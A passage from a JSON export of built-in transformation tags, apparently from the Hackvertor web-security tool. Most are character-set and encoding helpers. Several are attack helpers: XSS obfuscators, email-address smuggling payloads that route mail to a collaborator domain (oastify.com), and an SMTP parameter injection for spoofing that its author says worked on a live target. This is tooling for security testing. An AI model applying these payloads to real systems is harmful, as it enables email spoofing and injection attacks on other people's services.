function","viewed":208,"installed":0,"tagId":97,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-23T11:49:12.303Z","updatedAt":"$D2026-02-02T20:30:53.440Z"},{"id":"6721597ca6fcb9ff7dd1f9bf","name":"svgScriptComment","arguments":[],"code":"class svgScriptComment {\r\n encode(input) {\r\n return (\r\n \"\"\r\n );\r\n }\r\n}\r\n","category":"XSS","description":"Splits every character and adds a XML comment around it with SVG script.","viewed":204,"installed":0,"tagId":98,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-29T21:54:04.921Z","updatedAt":"$D2025-05-22T12:54:25.649Z"},{"id":"6722129dd9dfc22dd6d24346","name":"xmlEntity","arguments":[{"type":"string","help":"This is the entity name","defaultValue":"name"},{"type":"string","help":"This is the entity value","defaultValue":"value"}],"code":"class xmlEntity {\r\n encode(input, name, value) {\r\n return `\r\n]>`;\r\n }\r\n}\r\n","category":"XML","description":"This tag creates a XML entity. The parameters create a name and value.","viewed":216,"installed":0,"tagId":99,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-30T11:03:57.949Z","updatedAt":"$D2025-05-22T12:54:25.668Z"},{"id":"67236bbac671ea08b4e42c96","name":"us_ascii","arguments":[],"code":"class us_ascii {\r\n encode(input) {\r\n return input\r\n .split(\"\")\r\n .map((chr) => String.fromCodePoint(chr.codePointAt() + 128))\r\n .join(\"\");\r\n }\r\n\r\n decode(input) {\r\n return input\r\n .split(\"\")\r\n .map((chr) => String.fromCodePoint(chr.codePointAt() - 128))\r\n .join(\"\");\r\n }\r\n}\r\n","category":"Charsets","description":"Shifts the charcodes by 128 to create malformed US-ASCII","viewed":384,"installed":0,"tagId":101,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-31T11:36:26.778Z","updatedAt":"$D2025-05-22T12:54:25.650Z"},{"id":"6723773ad452f6be59d36900","name":"jsArray","arguments":[],"code":"class jsArray {\r\n encode(input) {\r\n return JSON.stringify(input.split(\",\"));\r\n }\r\n}\r\n","category":"Array","description":"Splits on comma and creates a JS array","viewed":403,"installed":0,"tagId":102,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-10-31T12:25:30.804Z","updatedAt":"$D2025-05-22T12:54:25.662Z"},{"id":"6724bd4ee5aa454ab7417c78","name":"bom","arguments":[{"type":"string","help":"This provides the charset - Supported charsets are: UTF-8,UTF16BE,UTF16LE,UTF32BE,UTF32LE,UTF-7,SCSU,BOCU1,GB18030,UTF1,UTF-EBCDIC,UTF-7Modified","defaultValue":"UTF-8"}],"code":"class bom {\r\n encode(input, charset) {\r\n const boms = {\r\n __proto__: null,\r\n \"UTF-8\": String.fromCodePoint(0xef, 0xbb, 0xbf),\r\n UTF16BE: String.fromCodePoint(0xfe, 0xff),\r\n UTF16LE: String.fromCodePoint(0xff, 0xfe),\r\n UTF32BE: String.fromCodePoint(0x00, 0x00, 0xfe, 0xff),\r\n UTF32LE: String.fromCodePoint(0xff, 0xfe, 0x00, 0x00),\r\n \"UTF-7\": String.fromCodePoint(0x2b, 0x2f, 0x76, 0x38, 0x2d),\r\n SCSU: String.fromCodePoint(0x0e, 0xfe, 0xff),\r\n BOCU1: String.fromCodePoint(0xfb, 0xee, 0x28),\r\n GB18030: String.fromCodePoint(0x84, 0x31, 0x95, 0x33),\r\n UTF1: String.fromCodePoint(0xf7, 0x64, 0x4c),\r\n CESU8: String.fromCodePoint(0xef, 0xbb, 0xbf),\r\n \"UTF-EBCDIC\": String.fromCodePoint(0xdd, 0x73, 0x66, 0x73),\r\n \"UTF-7MODIFIED\": String.fromCodePoint(0x2b, 0x2f, 0x76, 0x38),\r\n };\r\n return boms[charset.toUpperCase()];\r\n }\r\n}\r\n","category":"Charsets","description":"This produces BOM characters for the charset specified in the parameter.","viewed":427,"installed":0,"tagId":103,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-11-01T11:36:46.124Z","updatedAt":"$D2025-05-22T12:54:25.633Z"},{"id":"6729d6bb94c7b0a9dfa5940f","name":"unicodeWhitespace","arguments":[],"code":"class unicodeWhitespace {\r\n encode(input) {\r\n return [\r\n 9, 10, 11, 12, 13, 32, 160, 5760, 8192, 8193, 8194, 8195, 8196, 8197,\r\n 8198, 8199, 8200, 8201, 8202, 8232, 8233, 8239, 8287, 12288, 65279,\r\n ]\r\n .map((c) => String.fromCodePoint(c))\r\n .join(\"\");\r\n }\r\n}\r\n","category":"String","description":"This tags returns all unicode whitespace","viewed":458,"installed":0,"tagId":104,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-11-05T08:26:35.083Z","updatedAt":"$D2025-05-30T21:40:06.813Z"},{"id":"672a18fd230a3c4cb80edbe8","name":"splitJoin","arguments":[{"type":"string","help":"This provides the split character","defaultValue":","},{"type":"string","help":"This provides the join character","defaultValue":","}],"code":"class splitJoin {\r\n encode(input, splitChar, joinChar) {\r\n return input.split(splitChar).join(joinChar);\r\n }\r\n}\r\n","category":"String","description":"This tag splits the input with the split parameter and then joins it with the join parameter.","viewed":495,"installed":0,"tagId":105,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-11-05T13:09:17.191Z","updatedAt":"$D2025-05-30T21:40:06.697Z"},{"id":"6733cade04cb20d9bbd4d0d7","name":"restrictedVectors","arguments":[],"code":"class restrictedVectors {\r\n encode(input) {\r\n return hv.variables.xssCheatSheet.restrictedCharacters.map(\r\n (vector) => vector.code,\r\n ).join(\"\\n\");\r\n }\r\n}\r\n","category":"XSS","description":"This tags returns all XSS vectors on the XSS cheat sheet that can be used with restricted characters such as no parentheses.","viewed":452,"installed":0,"tagId":106,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-11-12T21:38:38.004Z","updatedAt":"$D2025-05-30T21:40:06.694Z"},{"id":"673b5c708dbf9b72ce6320dc","name":"utf8BytesHex","arguments":[],"code":"class utf8BytesHex {\n encode(input) {\n const encoder = new TextEncoder();\n const utf8Array = encoder.encode(input);\n return Array.from(utf8Array)\n .map((byte) => \"0x\" + byte.toString(16).toUpperCase().padStart(2, \"0\"))\n .join(\" \");\n }\n}\n","category":"Charsets","description":"This converts a unicode character into the UTF-8 bytes and returns the output as hex.","viewed":436,"installed":0,"tagId":107,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-11-18T15:25:36.637Z","updatedAt":"$D2025-05-30T21:40:06.688Z"},{"id":"6746df9bb45ad92dc3b3d197","name":"punycode","arguments":[],"code":"$23","category":"Convert","description":"This tag converts Punycode","viewed":430,"installed":0,"tagId":109,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-11-27T09:00:11.286Z","updatedAt":"$D2026-02-02T20:31:43.459Z"},{"id":"674e07ad75f2df11ba3130f9","name":"zalgo","arguments":[{"type":"number","help":"This provides the number of zalgo characters to repeat","defaultValue":"20"}],"code":"$24","category":"Convert","description":"This tag produces zalgo text that goes upwards and downwards","viewed":459,"installed":0,"tagId":110,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-12-02T19:17:01.454Z","updatedAt":"$D2025-05-30T21:37:29.161Z"},{"id":"6752b243794f0bc03c4f0cdf","name":"nextLineChar","arguments":[],"code":"class nextLineChar {\r\n encode(input) {\r\n return \"\\u0085\";\r\n }\r\n}\r\n","category":"String","description":"Returns the next line character","viewed":481,"installed":0,"tagId":112,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-12-06T08:13:55.102Z","updatedAt":"$D2025-05-30T21:37:29.035Z"},{"id":"6756e4597b42fb23f336fb6f","name":"overlongUTF8","arguments":[{"type":"number","help":"Length of overlong sequence","defaultValue":"6"},{"type":"boolean","help":"Use raw characters or not","defaultValue":"false"}],"code":"class overlongUTF8 {\r\n encode(input, length, rawchars) {\r\n function overLongUTF8(chr, n, rawchars) {\r\n //thanks sdc for making a smaller version!\r\n if (n < 2) return escape(String.fromCharCode(chr));\r\n var chars = [\r\n String.fromCharCode(\r\n (0x100 - (1 << (8 - n))) |\r\n ((1 << (7 - n)) - 1 && chr >> (6 * (n - 1))),\r\n ),\r\n ];\r\n chr %= n < 7 ? 1 << (6 * (n - 1)) : Math.pow(2, 6 * (n - 1));\r\n for (var i = 1; i < n; i++) {\r\n chars.push(\r\n String.fromCharCode(0x80 | (63 & (chr >> (6 * (n - i - 1))))),\r\n );\r\n chr %= n < 7 ? 1 << (6 * (n - i - 1)) : Math.pow(2, 6 * (n - i - 1));\r\n }\r\n return rawchars ? chars.join(\"\") : escape(chars.join(\"\"));\r\n }\r\n var output = [];\r\n input = input.split(\"\");\r\n for (var i = 0; i < input.length; i++) {\r\n output.push(overLongUTF8(input[i].charCodeAt(0), length, rawchars));\r\n }\r\n return output.join(\"\");\r\n }\r\n}\r\n","category":"Charsets","description":"This tag converts all characters below or equal to 0x7ff into overflow UTF-8 sequences","viewed":485,"installed":0,"tagId":113,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-12-09T12:36:41.027Z","updatedAt":"$D2026-01-21T18:58:01.131Z"},{"id":"6756e89a33c360db5a3af2cc","name":"ternary","arguments":[],"code":"$25","category":"XSS","description":"This tag is based on a old Hackvertor tag I wrote years ago. It does random expressions and obfuscates via ternary operations.","viewed":499,"installed":0,"tagId":114,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-12-09T12:54:50.148Z","updatedAt":"$D2025-05-30T21:37:28.760Z"},{"id":"676415f3c355e5cc10a4a519","name":"hexBytes","arguments":[],"code":"class hexBytes {\r\n encode(input) {\r\n return input.replaceAll(/[\\x00-\\xff]/gi, function (c) {\r\n return c.codePointAt(0).toString(16).padStart(2, \"0\");\r\n });\r\n }\r\n\r\n decode(input) {\r\n return input.replaceAll(/[a-fA-F0-9]{2}/gi, function (hex) {\r\n return String.fromCodePoint(parseInt(hex, 16));\r\n });\r\n }\r\n}\r\n","category":"Convert","description":"This encodes and decodes hex bytes","viewed":468,"installed":0,"tagId":116,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-12-19T12:47:47.769Z","updatedAt":"$D2025-05-30T21:37:28.576Z"},{"id":"6764238937e057e64bd8fd9a","name":"templateStringExpression","arguments":[],"code":"class templateStringExpression {\r\n encode(input) {\r\n const backtick = \"`\";\r\n return eval(backtick + input + backtick);\r\n }\r\n}\r\n","category":"Convert","description":"This tag wraps in the input in an eval and backticks","viewed":478,"installed":0,"tagId":117,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-12-19T13:45:45.842Z","updatedAt":"$D2025-05-30T21:37:28.368Z"},{"id":"676431847ef956ca60853647","name":"extractAscii","arguments":[],"code":"class extractAscii {\r\n encode(input) {\r\n return input.replaceAll(/[^\\x00-\\x7f]/gi, \"\");\r\n }\r\n}\r\n","category":"Convert","description":"This tag gathers all ascii characters and removes the rest.","viewed":481,"installed":0,"tagId":118,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-12-19T14:45:24.046Z","updatedAt":"$D2025-05-30T21:37:28.177Z"},{"id":"67657ed78687cd38e7bb53c3","name":"phpChr","arguments":[],"code":"class phpChr {\r\n encode(input) {\r\n return input\r\n .replaceAll(/[\\x00-\\xff]/gi, function (c) {\r\n return \"chr(\" + c.codePointAt(0) + \").\";\r\n })\r\n .replace(/[.]$/, \"\");\r\n }\r\n\r\n decode(input) {\r\n return input.replaceAll(/chr[(][\\d]+[)][.]?/g, function (c) {\r\n return String.fromCodePoint(c.replace(/chr[(]|[)]/g, \"\"));\r\n });\r\n }\r\n\r\n startsWith(input) {\r\n return /^chr[(][\\d]+[)][.]?/g.exec(input);\r\n }\r\n\r\n matches(input) {\r\n return /^chr[(][\\d]+[)][.]?$/g.exec(input);\r\n }\r\n}\r\n","category":"Convert","description":"Encodes and decodes as the php chr() function","viewed":485,"installed":0,"tagId":120,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2024-12-20T14:27:35.219Z","updatedAt":"$D2026-02-02T20:32:16.135Z"},{"id":"6777e50f8c4b32dc6fffde07","name":"iso2022Escapes","arguments":[],"code":"class iso2022Escapes {\r\n encode(input) {\r\n const escapeSequences = [\r\n String.fromCodePoint(0x1b, 0x28, 0x42),\r\n String.fromCodePoint(0x1b, 0x28, 0x4a),\r\n String.fromCodePoint(0x1b, 0x24, 0x40),\r\n String.fromCodePoint(0x1b, 0x24, 0x42),\r\n String.fromCodePoint(0x1b, 0x28, 0x49),\r\n ];\r\n return escapeSequences.join(\"\\n\");\r\n }\r\n}\r\n","category":"Charsets","description":"Returns all the ISO-2022-JP escape sequences","viewed":411,"installed":0,"tagId":121,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-01-03T13:24:31.193Z","updatedAt":"$D2025-05-30T21:37:27.805Z"},{"id":"678e172a7b6ccbf1ca3e15fd","name":"unicodeTruncation","arguments":[{"type":"number","help":"Position to start from","defaultValue":"20000"},{"type":"number","help":"Position to end","defaultValue":"30000"}],"code":"class unicodeTruncation {\r\n encode(input, start, end) {\r\n return input\r\n .split(\"\")\r\n .map((chr) => {\r\n const codePoint = chr.codePointAt(0);\r\n if (codePoint > 0x7f) {\r\n return chr;\r\n }\r\n const output = [];\r\n for (let i = start; i <= end; i++) {\r\n let hex = i.toString(16).toLowerCase().padStart('0', 6);\r\n if (hex.endsWith(codePoint.toString(16).toLowerCase().padStart(2, '0'))) {\r\n output.push(String.fromCodePoint(i));\r\n }\r\n }\r\n return output.join(\"\");\r\n })\r\n .join(\"\");\r\n }\r\n}\r\n","category":"Charsets","description":"Converts ASCII characters to characters that end with the hex byte of the character being converted. See https://infosecwriteups.com/6000-with-microsoft-hall-of-fame-microsoft-firewall-bypass-crlf-to-xss-microsoft-bug-bounty-8f6615c47922","viewed":353,"installed":0,"tagId":124,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-01-20T09:28:10.204Z","updatedAt":"$D2025-05-30T21:37:27.508Z"},{"id":"679b4a5dc8174f0c158fd5b6","name":"malformedUrl","arguments":[],"code":"class malformedUrl {\r\n encode(input) {\r\n const nibbleCharMap = [\r\n \"0\",\r\n \"!\",\r\n '\"',\r\n \"^\",\r\n \"$\",\r\n \"5\",\r\n \"&\",\r\n \"'\",\r\n \"(\",\r\n \")\",\r\n \"*\",\r\n \"+\",\r\n \",\",\r\n \"-\",\r\n \".\",\r\n \"/\",\r\n ];\r\n\r\n return Array.from(input)\r\n .map((ch) => {\r\n const code = ch.codePointAt(0);\r\n const adjusted = code - 16;\r\n const high = adjusted >> 4;\r\n const low = adjusted & 15;\r\n return `%${nibbleCharMap[high]}${nibbleCharMap[low]}`;\r\n })\r\n .join(\"\");\r\n }\r\n\r\n decode(input) {\r\n return input.replace(/%(..)/gi, function ($0, c) {\r\n return String.fromCodePoint(\r\n parseInt(\r\n (c.charAt(0).codePointAt(0) % 0x10).toString(16) +\r\n (c.charAt(1).codePointAt(0) % 0x10).toString(16),\r\n 16,\r\n ),\r\n );\r\n });\r\n }\r\n}\r\n","category":"Convert","description":"This tag emulates a defective encoder found on a web site.","viewed":299,"installed":0,"tagId":126,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-01-30T09:46:05.056Z","updatedAt":"$D2025-05-30T21:37:27.338Z"},{"id":"682b1dac53f6c9b37d19b0a8","name":"utf16","arguments":[],"code":"class utf16 {\r\n encode(input) {\r\n const buf = new ArrayBuffer(input.length * 2);\r\n const view = new DataView(buf);\r\n for (let i = 0; i < input.length; i++) {\r\n view.setUint16(i * 2, input.charCodeAt(i), false);\r\n }\r\n return Array.from(new Uint8Array(buf), (b) => String.fromCharCode(b)).join(\r\n \"\",\r\n );\r\n }\r\n\r\n decode(input) {\r\n const bytes = new Uint8Array(Array.from(input, (c) => c.charCodeAt(0)));\r\n const view = new DataView(bytes.buffer);\r\n let result = \"\";\r\n for (let i = 0; i < bytes.length; i += 2) {\r\n result += String.fromCharCode(view.getUint16(i, false));\r\n }\r\n return result;\r\n }\r\n}\r\n","category":"Charsets","description":"Standard UTF-16 (big-endian)","viewed":41,"installed":0,"tagId":140,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-05-19T12:01:48.386Z","updatedAt":"$D2025-05-30T21:37:26.926Z"},{"id":"682b1df853f6c9b37d19b0aa","name":"utf16BE","arguments":[],"code":"class utf16BE {\r\n encode(input) {\r\n const buf = new ArrayBuffer(input.length * 2);\r\n const view = new DataView(buf);\r\n for (let i = 0; i < input.length; i++) {\r\n view.setUint16(i * 2, input.charCodeAt(i), false);\r\n }\r\n return Array.from(new Uint8Array(buf), b => String.fromCharCode(b)).join('');\r\n }\r\n\r\n decode(input) {\r\n const bytes = new Uint8Array(Array.from(input, c => c.charCodeAt(0)));\r\n const view = new DataView(bytes.buffer);\r\n let result = '';\r\n for (let i = 0; i < bytes.length; i += 2) {\r\n result += String.fromCharCode(view.getUint16(i, false));\r\n }\r\n return result;\r\n }\r\n}\r\n","category":"Charsets","description":"utf16BE – UTF-16 Big Endian","viewed":41,"installed":0,"tagId":141,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-05-19T12:03:04.030Z","updatedAt":"$D2025-05-30T21:37:26.781Z"},{"id":"682b1e2653f6c9b37d19b0ac","name":"utf16LE","arguments":[],"code":"class utf16LE {\r\n encode(input) {\r\n const buf = new ArrayBuffer(input.length * 2);\r\n const view = new DataView(buf);\r\n for (let i = 0; i < input.length; i++) {\r\n view.setUint16(i * 2, input.charCodeAt(i), true);\r\n }\r\n return Array.from(new Uint8Array(buf), b => String.fromCharCode(b)).join('');\r\n }\r\n\r\n decode(input) {\r\n const bytes = new Uint8Array(Array.from(input, c => c.charCodeAt(0)));\r\n const view = new DataView(bytes.buffer);\r\n let result = '';\r\n for (let i = 0; i < bytes.length; i += 2) {\r\n result += String.fromCharCode(view.getUint16(i, true));\r\n }\r\n return result;\r\n }\r\n}\r\n","category":"Charsets","description":"utf16LE – UTF-16 Little Endian","viewed":41,"installed":0,"tagId":142,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-05-19T12:03:50.377Z","updatedAt":"$D2025-05-30T21:37:21.372Z"},{"id":"683ed943b17e9f86de49c28d","name":"svg","arguments":[],"code":"class svg {\r\n encode(input) {\r\n return ``;\r\n }\r\n}\r\n","category":"XSS","description":"This tag returns a valid SVG document for use with image/svg+xml content type.","viewed":0,"installed":0,"tagId":144,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-06-03T11:15:15.701Z","updatedAt":"$D2025-06-03T11:15:15.701Z"},{"id":"686c0a2c7ec179cf636ef0e7","name":"mathml","arguments":[],"code":"class mathml {\r\n encode(input) {\r\n return `

\r\n \r\n E \r\n = \r\n m \r\n {\r\n}^{c \r\n 2 \r\n} \r\n \r\n

\r\n`;\r\n }\r\n}\r\n","category":"XSS","description":"This tag just returns a Math tag with the famous Einstein equation.","viewed":0,"installed":0,"tagId":146,"isBuiltIn":true,"isSelfClosing":true,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-07-07T17:55:56.151Z","updatedAt":"$D2025-07-07T17:55:56.151Z"},{"id":"68b98766ac75dcf4b5d33f16","name":"prefixSuffix","arguments":[{"type":"string","help":"This is the prefix to add to each piece","defaultValue":"&"},{"type":"string","help":"This is the suffix to add to each piece","defaultValue":";"}],"code":"class prefixSuffix {\r\n encode(input, prefix, suffix) {\r\n return input\r\n .split(\"\\n\")\r\n .map((element) => prefix + element + suffix)\r\n .join(\"\\n\");\r\n }\r\n}\r\n","category":"String","description":"This tag splits the input into pieces using new lines and then joins them with each element getting a prefix and suffix.","viewed":0,"installed":0,"tagId":151,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-09-04T12:34:46.538Z","updatedAt":"$D2025-09-04T12:34:46.538Z"},{"id":"68bac06d0184decc8383efdb","name":"nest","arguments":[{"type":"number","help":"This provides the depth amount","defaultValue":"512"}],"code":"class nest {\r\n encode(input, depth) {\r\n if (depth <= 0) return input;\r\n const m = input.match(/^<([a-zA-Z][\\w:-]*)([^>]*)>([\\s\\S]*)<\\/\\1>$/);\r\n if (!m) throw new Error(\"Input must be a single root element\");\r\n const tag = m[1];\r\n const attrs = m[2];\r\n const open = `<${tag}${attrs}>`;\r\n const close = ``;\r\n let content = m[3];\r\n for (let i = 0; i < depth; i++) {\r\n content = open + content + close;\r\n }\r\n return content;\r\n }\r\n}\r\n","category":"XML","description":"This tag will nest XML nodes to a given depth. E.g. if the input is test the result will be: test for a depth of 3","viewed":0,"installed":0,"tagId":152,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-09-05T10:50:21.337Z","updatedAt":"$D2025-09-05T12:30:27.713Z"},{"id":"68bb4447260b3dfad233c021","name":"permute","arguments":[{"type":"number","help":"Maximum number of permutations to generate (default: 720)","defaultValue":"720"}],"code":"class permute {\r\n encode(input, maxPerms) {\r\n maxPerms = maxPerms || 720;\r\n const arr = input.split(\"\");\r\n const results = new Set();\r\n\r\n function generate(prefix, remaining) {\r\n if (results.size >= maxPerms) return;\r\n if (remaining.length === 0) {\r\n results.add(prefix);\r\n } else {\r\n for (let i = 0; i < remaining.length; i++) {\r\n generate(\r\n prefix + remaining[i],\r\n remaining.slice(0, i) + remaining.slice(i + 1),\r\n );\r\n if (results.size >= maxPerms) return;\r\n }\r\n }\r\n }\r\n\r\n generate(\"\", arr.join(\"\"));\r\n\r\n if (results.size >= maxPerms && arr.length > 1) {\r\n throw new Error(\r\n `Too many permutations (${results.size}); limit is ${maxPerms}`,\r\n );\r\n }\r\n\r\n return Array.from(results).join(\"\\n\");\r\n }\r\n}\r\n","category":"Math","description":"Generate all unique permutations of the inner content’s characters as separate lines. If the number of permutations exceeds a safe threshold, display an error or warning message instead.","viewed":0,"installed":0,"tagId":153,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-09-05T20:12:55.324Z","updatedAt":"$D2025-09-05T20:12:55.324Z"},{"id":"68c1cf1f60ab15c6d1435923","name":"toStringObfuscator","arguments":[{"type":"number","help":"This is the minimum base","defaultValue":"2"},{"type":"number","help":"This is the maximum base","defaultValue":36}],"code":"class toStringObfuscator {\r\n encode(target, minBase, maxBase) {\r\n const s = target.toLowerCase();\r\n\r\n for (let base = minBase; base <= maxBase; base++) {\r\n if ([...s].some((c) => parseInt(c, 36) >= base || isNaN(parseInt(c, 36))))\r\n continue;\r\n\r\n let n = 0n;\r\n for (const ch of s) {\r\n n = n * BigInt(base) + BigInt(parseInt(ch, 36));\r\n }\r\n\r\n if (n.toString(base) === s) {\r\n const literal =\r\n n <= BigInt(Number.MAX_SAFE_INTEGER) ? n.toString() : `${n}n`;\r\n return `${literal}..toString(${base})`;\r\n }\r\n }\r\n return null;\r\n }\r\n}\r\n","category":"XSS","description":"This obfuscate a string into a number where possible. For example \"test\" becomes 796469..toString(30)","viewed":0,"installed":0,"tagId":154,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-09-10T19:18:55.925Z","updatedAt":"$D2025-09-10T19:20:12.251Z"},{"id":"68c1d9d2fbe937e7abdb768a","name":"smtpParameters","arguments":[{"type":"string","help":"This is your collaborator payload","defaultValue":"collab"},{"type":"string","help":"This is your collaborator domain","defaultValue":"oastify.com"}],"code":"class smtpParameters {\r\n encode(input, collaboratorPayload, collaborator) {\r\n let[user,domain] = input.split(\"@\");\r\n return `\"${collaboratorPayload}\\\\\"@${collaborator}> ORCPT=test;${user}\"@${domain}`;\r\n }\r\n}\r\n","category":"Email","description":"This tag creates a SMTP parameter attack. I've found this attack on a live target. The parameters specify your collaborator payload and domain. The input should contain the email you want to spoof.","viewed":0,"installed":0,"tagId":155,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-09-10T20:04:34.359Z","updatedAt":"$D2025-09-10T20:04:34.359Z"},{"id":"68c1db34bc0dfe8b9b237a0b","name":"uucpBang","arguments":[{"type":"string","help":"UUCP relay domain","defaultValue":"oastify.com"},{"type":"boolean","help":"Escape the @ in the inner address set to true or false","defaultValue":"true"}],"code":"class uucpBang {\r\n encode(input, relayDomain, escapeAt) {\r\n relayDomain = relayDomain || \"oastify.com\";\r\n const inner = escapeAt ? input.replace(\"@\", \"\\\\@\") : input;\r\n return relayDomain + \"!\" + inner;\r\n }\r\n}\r\n","category":"Email","description":"Creates a bang‑path address to tickle UUCP style routing quirks in mailers.","viewed":0,"installed":0,"tagId":156,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-09-10T20:10:28.973Z","updatedAt":"$D2025-09-10T20:16:34.320Z"},{"id":"68c1db72bc0dfe8b9b237a0d","name":"percentRoute","arguments":[{"type":"string","help":"Route domain to use after %","defaultValue":"psres.net"},{"type":"string","help":"Style paren or bracket","defaultValue":"paren"},{"type":"string","help":"Destination domain or address","defaultValue":"example.com"}],"code":"class percentRoute {\r\n encode(input, routeDomain, style, dest) {\r\n routeDomain = routeDomain || 'psres.net';\r\n style = (style || 'paren').toLowerCase();\r\n dest = dest || 'example.com';\r\n const local = input.split('@')[0];\r\n if (style === 'bracket') return local + '%' + routeDomain + '@[' + dest + ']';\r\n return local + '%' + routeDomain + '(@' + dest;\r\n }\r\n}\r\n","category":"Email","description":"Builds percent‑hack or source‑route flavoured addresses. Two styles: paren gives local%route(@dest and bracket gives local%route@[ip].","viewed":0,"installed":0,"tagId":157,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-09-10T20:11:30.357Z","updatedAt":"$D2025-09-10T20:11:30.357Z"},{"id":"68c1e608d7d1511fe167ed0f","name":"punyCommaSplit","arguments":[{"type":"string","help":"Left domain","defaultValue":"example.com"},{"type":"string","help":"Right domain","defaultValue":"oastify.com"}],"code":"class punyCommaSplit {\r\n encode(input, leftDomain, rightDomain) {\r\n const local = (input || \"collab\").split(\"@\")[0];\r\n leftDomain = leftDomain || \"example.com\";\r\n rightDomain = rightDomain || \"oastify.com\";\r\n return local + \"@\" + leftDomain + \".xn--0049.\" + rightDomain;\r\n }\r\n}\r\n","category":"Email","description":"This tag creates an email address where the domain portion is split using a malformed Punycode label that some buggy IDN libraries interpret as a comma (xn--0049). ","viewed":0,"installed":0,"tagId":159,"isBuiltIn":true,"isSelfClosing":false,"userId":"66ce102d5ff32784eaefa4b9","createdAt":"$D2025-09-10T20:56:40.067Z","updatedAt":"$D2025-09-10T20:57:01.820Z"},{"id":"68c1e7f34cad8054caf51685","name":"punyStyleOpen","arguments":[],"code":"class punyStyleOpen {\r\n encode(input) {\r\n const local = (input || 'x').split('@')[0];\r\n return local + '@xn--style-321';\r\n }\r\n}\r\n","category":"Email","description":"Produces an address that decodes under buggy IDN to start an HTML